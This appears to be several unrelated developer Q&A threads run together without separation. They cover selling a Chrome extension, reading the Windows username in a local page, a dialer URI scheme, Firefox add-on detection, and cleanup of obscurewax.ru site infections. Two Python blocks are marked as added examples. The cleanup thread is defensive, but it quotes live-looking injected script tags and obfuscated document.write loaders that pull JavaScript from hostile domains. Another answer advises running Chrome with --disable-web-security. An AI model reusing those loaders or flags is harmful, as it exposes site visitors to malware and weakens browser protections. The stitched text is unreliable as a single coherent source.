I am trying to sell my chrome extension. I have the manifest.json, the background.js, popup html and one more js file.
I have researched everywhere to find a way to sell this, but the only source I have found was to include this code:
(function() { var f=this,g=function(a,d){var c=a.split("."),b=window||f;c[0]in b||!b.execScript||b.execScript("var "+c[0]);for(var e;c.length&&(e=c.shift());)c.length||void 0===d?b=b[e]?b[e]:b[e]={}:b[e]=d};var h=function(a){var d=chrome.runtime.connect("nmmhkkegccagdldgiimedpiccmgmieda",{}),c=!1;d.onMessage.addListener(function(b){c=!0;"response"in b&&!("errorType"in b.response)?a.success&&a.success(b):a.failure&&a.failure(b)});d.onDisconnect.addListener(function(){!c&&a.failure&&a.failure({request:{},response:{errorType:"INTERNAL_SERVER_ERROR"}})});d.postMessage(a)};g("google.payments.inapp.buy",function(a){a.method="buy";h(a)});
g("google.payments.inapp.consumePurchase",function(a){a.method="consumePurchase";h(a)});g("google.payments.inapp.getPurchases",function(a){a.method="getPurchases";h(a)});g("google.payments.inapp.getSkuDetails",function(a){a.method="getSkuDetails";h(a)}); })();
...but, they haven't told me where to include it.
Do I include it in a separate js file?
I have created a merchant account, and I cannot find any way to get this to sell. It is already published on the extension chrome store as a free extension, but when I change the settings to "paid extension" on the chrome store it says it is unavailable.
Is there some secret setting I need to know about?
I have Apache installed on a Windows laptop that is not connected to the internet. The laptop has multiple user accounts. Let's say that two of the user accounts are "Adam" and "Sally". I have a project on localhost that needs to differentiate between the different Windows users via the Chrome browser.
I understand detecting the username through the browser directly is a gross security sandbox breach, but I don't care: I have complete control of the computer and the project is not web accessible, so there are no security concerns. I'm willing to cheat in any way imaginable including building a custom .exe to help. I just need to differentiate between the different accounts. It doesn't need to be by username, but any alternative ID would need to persist for that given user.
I am asking for outside of the box thinking.
How can I create a page that I can open in Chrome that will say "Hi Adam" or "Hi Sally" or even "Hi -=[GUID]=-" without the visitor ever typing in their name/guid.
You should probably use something like NW.js or Electron instead of chrome for this so you don't have to sacrifice security.
Here's a picture of me running the nw.js sdk and loading just the demo page, bringing up the dev tools and retrieving my username.
Pretty straight forward. Follow node documentation and do whatever you'd like there.
You could have a batch file that runs on startup via the task scheduler or registry in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run or Local Group Policy that performs something like echo setCurrentUser("%USERNAME%"); > c:\your_project_directory\set-current-user.js, then you just have a script that defines <script>function setCurrentUser(s) { alert("Hello "+s); /* ... */ }</script> followed by a script import like <script src="set-current-user.js"></script>
If you just want to be able to do whatever in the filesystem, change the shortcut that launches Chrome to --allow-file-access-from-files --user-data-dir=c:\your_project_directory --disable-web-security and restart the PC (or just kill all chrome.exe processes, incl. background).
Edit: Updated with note on using --allow-file-access-from-files from Pritam Banerjee. If you go that route, he gets credit. :)
If you're interested in trying NW.js, here's a full example:
package.json :
{
"name": "nw-hello-user",
"version": "0.0.1",
"main": "index.html"
}
index.html :
<!DOCTYPE html>
<html>
<head>
<title>Hello!</title>
</head>
<body>
Hello <script>document.write(process.env.USERNAME)</script>!
</body>
</html>
Here's the command line:
Here's the end product!
Since you tagged your question with PHP, you could just create a index.php file with the following contents:
Hi <?= getenv("USERNAME") ?>
getenv("USERNAME") returns the value of the USERNAME environment variable.
Update: Thanks to TylerY86 for providing the more correct way to get the username. Also note from his comment below:
You also have to be sure that the Apache instance is running in the
context of the user, and not as a service. If you try the example, if
you get something like SYSTEM or IUSR_MACHINE instead of the user
name, you'll need to adjust.
You have 2 choices, as far as I see.
1) You may ask users to identify themselves the first time they use the page and store it in local storage. Since those are different users on the machine, their localStorages should be separate.
2) You may deploy a small web service on the local host, that gets the user credentials from the system and returns on GET request.
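Option 2 above as an added example (not code from the original answer): a per-user helper bound to loopback that returns the name of the account it runs under and refuses any request whose Host or Origin header is not the local project. Port 8765, the /whoami path and the allowed origins are assumptions of this example.

```python
import getpass
import json
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Assumptions of this example: the helper's port and path, and that the
# Apache project is served from http://localhost or http://127.0.0.1.
BIND_ADDR = "127.0.0.1"          # loopback only, never 0.0.0.0
PORT = 8765
ALLOWED_ORIGINS = {"http://localhost", "http://127.0.0.1"}


def check_request(host, origin, port):
    """Return (ok, reason) for the Host and Origin headers of a request."""
    # A Host header naming anything but loopback means the browser reached
    # us through a foreign name (DNS rebinding), so refuse it.
    if host not in {f"127.0.0.1:{port}", f"localhost:{port}"}:
        return False, "bad Host header"
    # Browsers send Origin on cross-origin fetches; only the local project
    # may read the answer. Requests without Origin are same-origin or tools.
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, "origin not allowed"
    return True, "ok"


class WhoAmIHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        port = self.server.server_address[1]
        origin = self.headers.get("Origin")
        if self.path != "/whoami":
            ok, reason = False, "unknown path"
        else:
            ok, reason = check_request(self.headers.get("Host"), origin, port)
        # getpass.getuser() reports the account this process runs under.
        payload = {"user": getpass.getuser()} if ok else {"error": reason}
        body = json.dumps(payload).encode()
        self.send_response(200 if ok else 403)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        if ok and origin:
            # Echo only an origin that passed the allow-list check.
            self.send_header("Access-Control-Allow-Origin", origin)
            self.send_header("Vary", "Origin")
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        pass  # keep the console quiet


def make_server(port=PORT):
    return ThreadingHTTPServer((BIND_ADDR, port), WhoAmIHandler)


if __name__ == "__main__":
    make_server().serve_forever()
```

The helper has to be started inside each user's own session so that it runs as that user; started as a service it would report the service account instead.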
I have actually been around internet development for quite a while now - but I never had to do the following and have no idea how to solve it:
Our computers have connected telephones which are used with the Dialer.exe.
As I am working on an internal client database in our network, I would like to support the feature of clicking a "link" == telephone number in the browser in our database -> that click should execute the following task: open dialer.exe on the user's C:// and paste the telephone number into the number field.
Thank you for your help.
That should be possible by adapting a Custom-URI-Scheme to your needs. See here:
https://msdn.microsoft.com/en-us/library/aa767914%28v=vs.85%29.aspx
Problematic is that this solution is yet Windows only and that you need to set registry-entries on every machine. Probably those values are applicable with an appropriate infrastructure but if there's not domain existent this could be a horrendous amount of work...
Edit:
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\telephone]
@="URL:Telephone Dialer"
"URL Protocol"=""
[HKEY_CLASSES_ROOT\telephone\DefaultIcon]
@="\"C:\\Windows\\System32\\dialer.exe\",1"
[HKEY_CLASSES_ROOT\telephone\shell]
"URL Protocol"=""
[HKEY_CLASSES_ROOT\telephone\shell\open]
[HKEY_CLASSES_ROOT\telephone\shell\open\command]
@="\"C:\\Windows\\System32\\dialer.exe\" \"%1\""
Here it is described how to check if Firebug is installed by checking if an image of firebug exists: http://webdevwonders.com/detecting-firefox-add-ons/
But it seems to be a bit outdated, cause the images he uses there don't exist anymore in firebug.
the firebug chrome.manifest looks like:
content firebug content/firebug/ contentaccessible=yes
...
but in the whole addon I only find one png now, and that is placed in the rootfolder of the addon. But some other content is accessible, for example: chrome://firebug/content/trace.js
Ho
So, in general:
How do I make an image accessible that resides inside a Firefox SDK Addon?
I program an Addon and I want to make an image ok.png available to all javascripts in Firefox.
I added the image in the data folder and added a chrome.manifest
content response-timeout-24-hours data/
content response-timeout-24-hours data/ contentaccessible=yes
But no way to call it via a URL like
chrome://response-timeout-24-hours/data/ok.png
How do the paths belong together? Which is relative to which?
I created a Bug report here.
So if you want to make your add-on detectable you need another approach:
You can use a PageMod to attach a content script that would wait for a
message from your web-app and "respond" by sending another message
back to your app. You would know that if you don't receive the
response, your addon is not installed. Check out the documentation for
more details:
https://developer.mozilla.org/en-US/Add-ons/SDK/High-Level_APIs/page-mod
I used this to make my add-on detectable.
I have the following code added automatically into my script...
<script type="text/javascript" src="http://obscurewax.ru/Kilobyte.js"></script>
<!--72628eb2e686638651ad69b6a34a630f-->
at the end of each of my pages. When I view the source code of my page it shows me the above code, but when I open that file in Notepad or any editing software it shows me nothing but my own script. How can I remove that script from all of my files at once?
Also let me know why it is happening so far.
Edit 25-Aug :
Specific Domains & entries added(below)
New domain nuttypiano.com spotted.
Edit :
Figured it out. It was definitely Filezilla siphoning off my FTP passwords.
Keep an eye on .htaccess file and file permission -- they seem to change to 777.
Happened to me as well. It took all the passwords from the FTP program and then changed the PHP and js files to add the line
<script type="text/javascript" src="http://obscurewax.ru/Queue.js">
Mainly index.* files are targeted other files targeted are *.js files.
I believe the end js file name varies but you can track it from the obscurewax.ru domain.
I have around 8-10 websites where this has happened. Most of my websites are running joomla.
In what I have observed as yet, it likes to target the files that start with the word
index.
In a joomla install, there were about 122 files affected by this, almost all were in the :
joomla_install/administrator
folder.
It's a pain to download a Joomla install from the server because it's somewhere about 4-5 thousand files. Still, the strategy I am following is this.
Download the entire site on a folder, run a text search(I am using TextCrawler) for :
obscurewax.ru
Note the number of files and folders that have this and, more importantly, note all the variations of the js file names.
Do a search and replace for all the .js file variations eg :
<script type="text/javascript" src="http://obscurewax.ru/Queue.js">
<script type="text/javascript" src="http://obscurewax.ru/Cablemodem.js">
<script type="text/javascript" src="http://obscurewax.ru/Kilobyte.js">
In the .js files you will also find this type of code :
document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/AGP.js"></scr'+'ipt>'); // Found in .js files
Replace all with nothing ('').
Another thing you can do is replace obscurewax.ru with example.com.
I don't have a quick and easy way to remove the code in the comments below it(which I think they are using for tracking purposes.) -- but I think if you remove the script link, that comment is not going to hurt you.
Different domains spotted :
nuttypiano.com(spotted 25-Aug)
pocketbloke.ru
yumeye.ru
microlightning.ru
riotassistance.ru
// Denis125 <webmaster#atlant.ru> (comment in a .js file.)
Specific lines to lookout for :
<script type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></script>
<script type="text/javascript" src="http://riotassistance.ru/Undo.js"></script>
* Contributed by Open Web Technologies <http://openwebtech.ru/>
Denis125 <webmaster#atlant.ru>
// Author: Andrei Blagorazumov, a#fnr.ru
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Undo.js"></scri'+'pt>');
document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></scr'+'ipt>');
<script type="text/javascript" src="http://nuttypiano.com/Hard_Copy.js"></script>
<script type="text/javascript" src="http://nuttypiano.com/Facebook.js"></script>
document.write('<s'+'cript type="text/javascript" src="http://nuttypiano.com/Facebook.js"></scri'+'pt>');
Note: Sometimes you will not be able to see this link in your HTML in the source, but the file gets loaded because it's hiding in one of the JavaScripts. A good way to be sure you are really clean is to actually go in and see the .js files that are getting loaded while your page is loading and check if any .js files are loading from the suspected domain. An easy way to do this is to go into the developer tools in Chrome (Ctrl + Shift + I).
Here in the resources tab you will see the scripts filter, using this you can track all the .js files loading while your page loads. The firebug plugin in firefox will also let you see this info. If your website has several parts(front-end, back-end) you want to visit all the parts of the website and check if any suspicious .js files are getting loaded.
Very importantly
Update your Antivirus scanner and do a full scan on your computer for viruses.
If you are using an FTP program or your code editor has FTP capability you want to visit all the websites for which you have passwords stored and check if they were affected. If your FTP program/editor was compromised -- almost all the websites that you have ftp passwords stored for would have been affected.
Change the passwords for all the ftp accounts that were stored in the programs.
Uninstall the suspect program & use another one or re-download and install it.
This is the worst thing that can happen to a web-developer. This attack is generally done by tricking the victim(you and me) to believe there is an update for the FTP program from within the program, as soon as you install the update -- your sites will get affected.
I am working on this thing right now. If you have any better/shorter ways of doing this. Please share. Thanks!
I have a client's site that got hacked with a line of code from obscurewax.ru. The site is hosted on GoDaddy shared hosting. It looks like they edited multiple files yesterday on the server.
We are not sure how they entered the website but they did crash the website. We are right now going in and deleting everything to start over, as we are unsure of where they left files.
They left this line of code - obscurewax.ru/Heat_Sink.js
Which does nothing, but I am not taking any chances. According to whois, the domain was purchased just three days ago and the info is private. If it was the hosting provider it would be public. It's being hosted in Russia and on US websites; I see that as a red flag. I think they are building their network and will activate the scripts once they have a big enough footprint.
Hope that helps.
Who is your hosting provider? Some hosts do insert code (normally ad banners for free sites, but not always) to your web page on-the-fly. If you do have such a host, I recommend getting a different one.
Never attribute to a virus what may be due to a free webhost ;)
Is that actually the URL of the script being inserted in your pages? Because that's an empty file.
Hmmm.. It seems that it is proftpd 0day.
Pair of clients reported the problem on their sites.
There was proftpd 1.3.1 installed on the server.
Regarding log files attackers were bruteforcing only login names, not passwords.
After successful guessing the login name(regarding site's domain name, for example) they hadn't any problem to login...
Bad thing, I hope upgrading to 1.3.3 will fix it.
If you are running a Linux server, here are 2 fast console snippets to fix sites after the obscurewax attack:
cd /to/site/webroot
find ./ -type f -exec sed -i "s/document.write('<s'+'cript type=\"text\/javascript\" src=\"http:\/\/obscurewax.ru\/Google.js\"><\/scr'+'ipt>')//g" {} \;
find ./ -type f -exec sed -i 's/<script type="text\/javascript" src="http:\/\/obscurewax.ru\/Google.js"><\/script>//g' {} \;
Don't forget to replace Google.js with your variant of attacker's link.
UPDATE
The proftpd is clean. After some investigation I've found the real reason and it is just prosaic. One of the leading hosting managers was keeping the logins/passwords of many FTP users in his Filezilla on the Windows Desktop. All the passwords that he kept were stolen by a third party.
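The two sed commands above hard-code one file name. As an added example (not part of the original answer), this scanner matches any file name on the domains named in this thread, in both the plain tag and the split document.write form, and also lists world-writable files such as the 777 ones reported here. The handling of the 32-hex marker comment and the --fix flag are assumptions of this example.

```python
import os
import re
import stat
import sys

# Domains named in this thread; add to the tuple when a new one turns up.
DOMAINS = ("obscurewax.ru", "nuttypiano.com", "pocketbloke.ru",
           "yumeye.ru", "microlightning.ru", "riotassistance.ru")
_SRC = r'src="(https?://(?:%s)/[^"]*)"' % "|".join(map(re.escape, DOMAINS))

# document.write('<s'+'cript ... src="..."></scr'+'ipt>'); at any split point.
DOCWRITE = re.compile(r"document\.write\('<s[^\n)]*?" + _SRC + r"[^\n)]*?'\);?", re.I)
# <script ... src="..."> with optional </script> and trailing 32-hex comment.
TAG = re.compile(r"<script\b[^>]*?" + _SRC + r"[^>]*>(?:\s*</script>)?"
                 r"(?:\s*<!--[0-9a-f]{32}-->)?", re.I)


def find_injections(text):
    """Return sorted (line_number, kind, url) for every injected loader."""
    hits = []
    for kind, rx in (("document.write", DOCWRITE), ("script-tag", TAG)):
        for m in rx.finditer(text):
            hits.append((text.count("\n", 0, m.start()) + 1, kind, m.group(1)))
    return sorted(hits)


def clean(text):
    """Remove every injected loader, whatever the .js file name is."""
    return TAG.sub("", DOCWRITE.sub("", text))


def scan_tree(root, fix=False):
    """Walk root; report injected files and world-writable regular files."""
    report = {"injected": {}, "world_writable": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if not stat.S_ISREG(mode):
                continue                      # skip symlinks, sockets, ...
            if mode & stat.S_IWOTH:
                report["world_writable"].append(path)
            # latin-1 with newline="" round-trips every byte unchanged.
            with open(path, encoding="latin-1", newline="") as fh:
                text = fh.read()
            hits = find_injections(text)
            if hits:
                report["injected"][path] = hits
                if fix:
                    with open(path, "w", encoding="latin-1", newline="") as fh:
                        fh.write(clean(text))
    return report


if __name__ == "__main__":
    result = scan_tree(sys.argv[1], fix="--fix" in sys.argv[2:])
    for path, hits in sorted(result["injected"].items()):
        for line, kind, url in hits:
            print(f"{path}:{line}: {kind} -> {url}")
    for path in result["world_writable"]:
        print(f"{path}: world-writable")
```

Run it without --fix first and review the report; a clean result does not replace changing the stolen FTP passwords.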
I got the same problem on my website. They altered all .js files and added that line of code at the end.
The problem is that i can't find how they did it.
Could this be any components/plugins that is not updated perhaps?
How about we make a list of our components to see if we have some that are the same and maybe the curse of this hack?
My list is: (components)
Attachments
Banners Enabled 1.5.0 April 2006 Joomla! Project
CSV Improved Enabled 1.7 22 May 2009 RolandD Cyber Produksi
CSVI VirtueMart Enabled 2.0.1 28 November 2009 RolandD Cyber Produksi
docman Enabled 1.4.0.stable February 2009 Joomlatools
Easy Search Enabled 0.1.0 November 2008 Hiro Nozu
easysql Enabled 1.27 30/11/2006 Serebro
FrontpagePlus Disabled 0.1.0 January 2009 NoNumber! (Peter van Westen)
gk3_tabs_manager Disabled 3.0.2 31/05/2009 Gavick.com
JCE Enabled 157 23 June 2009 Ryan Demmer
JCrawler Enabled 1.7 Beta 20/4/2009 Patrick Winkler
JoomlaPack Enabled 2.4 2009-12-05 JoomlaPack Developers
K2 Enabled 2.1 September 9th, 2009 JoomlaWorks
Linkr Enabled 2.3.6 April 2008 Frank
Newsfeeds Enabled 1.5.0 April 2006 Joomla! Project
Polls Enabled 1.5.0 July 2004 Joomla! Project
Nova Enabled 1.7.5 February 2010 ProJoom
pjinstaller Enabled 1.0.8 January 2010 ProJoom
QContacts Disabled 1.0.3 July 2008 Massimo Giagnoni
QuickFAQ Enabled 1.0.3 01/02/2009 Christoph Lukes
redlinker Enabled 1.0b11 09/09/2009 Redweb.dk
redVMPRODUCTFINDER Enabled 1.10 21/01/2010 Redweb.dk
RokCandy Disabled 0.82a January 31, 2009 RocketWerx, LLC
RokModule Enabled 1.1 June 2008 RocketTheme
forme Enabled 1.0.4 07/02/2008 www.rsjoomla.com
RSform Enabled 1.2.0 17/06/2009 www.rsjoomla.com
rsinstaller Enabled 1.0.0 04/06/2009 www.rsjoomla.com
sh404sef Enabled 1.0.16_Beta Jan 2, 2009 Yannick Gaultier
VirtueMart Enabled 1.1.4 16.10.2009 The VirtueMart Development Team
vmemails Enabled 1.0.4b182 2009-11-28 InteraMind Advanced Analytics
Weblinks Enabled 1.5.0 April 2006 Joomla! Project
Xmap
Note: 2 months ago I did a complete cleanup of my PC and changed all passwords on the server and website. This only worked until now, where the virus is back, so my very good guess is that it's a component, module or plugin that is doing the damage. Yes, you can do all the virus clean up you want, but the issue will return!
I just stumbled on this; oops, it is quite a recent incident here. I thought that my site was the only one. I noticed that this script was always loading whenever I accessed my site; I was running a CMS but now I have shut it down. As for the suggestion of the vulnerability within FTP, count me out of this since I have never used FTP. I simply shut down the CMS section because even after running a fresh install of the latest release of the CMS another malicious script was still loading while accessing the site. That made me come to the conclusion that my web host's servers may have been compromised already. Other malicious scripts that had attacked my CMS include:
pocketbloke.ru
yumeye.ru, and
microlightning.ru
P.S: My .htaccess file was also altered and the file permissions to my CMS were all turned to 777. Could this be a cPanel vulnerability being exploited by these hackers?
Start with changing FTP or any other remote access passwords and check your computer/server for viruses. Something/someone is adding this automatically to all your files. Then you can use any mass-text-replacement tool like http://tools.tortoisesvn.net/grepWin to find that line in all files and remove them (by replacing with empty line).
UPDATE
I missed your line about that you don't see that line in your files source. Just check the rest of the file and check all JS files - they should include small portion of minified code which adds that line. You can also try to search all your files locally or by using any browsers developer tools to find where same URL or part of is mentioned.
Weird. I got the same thing in one of my client's index.html with a bunch of other mysterious files. Perhaps they got into his FTP. Of my 50 other clients, no one else was affected, it seems.
Upon inspection, random users have been able to access the FTP for a while. Here was the unique list of IPs that I know aren't the owner's:
Looks like some sort of mass attack. I would look at the timestamp on the files that were modified, see if any are close or if any of your other ftp people have logged in with those IPs. Just to note I am running debian linux server with proftpd...
I got a weird error message when trying to edit the file in WinSCP using Notepad2... so it looks like whatever code it is, it is messing up typical text editors. I was able to nano the file and delete the links though.
PS: I was made aware of this when google emailed me "Dear site owner or webmaster of [censored].com,
We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com."
Detected same problem today. I deleted all strings from js manually.
They are getting smarter.
My string was:
document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Scroll_Wheel.js"></scr'+'ipt>');
Malware infects a PC with stored ftp passwords. It then automatically takes the passwords and logs in and infects the website. Look for 2 recently modified files in c:\windows\system32\drivers
They are probably the culprits.
Here is the script found on my website by Google. Google had blocked my site because of "Malware"
I was trying "Word Press" and a theme, that I paid for, "The Local". This, in my opinion, is the only path that this script could have been added. I removed all scripts of Word Press and The Local, and now Google does not detect Malware on my site.
My solution was deletion of all the scripts that I mentioned and replace everything with standard HTML. The other scripts were mostly all PHP, and I find HTML to be much more stable.
Good Luck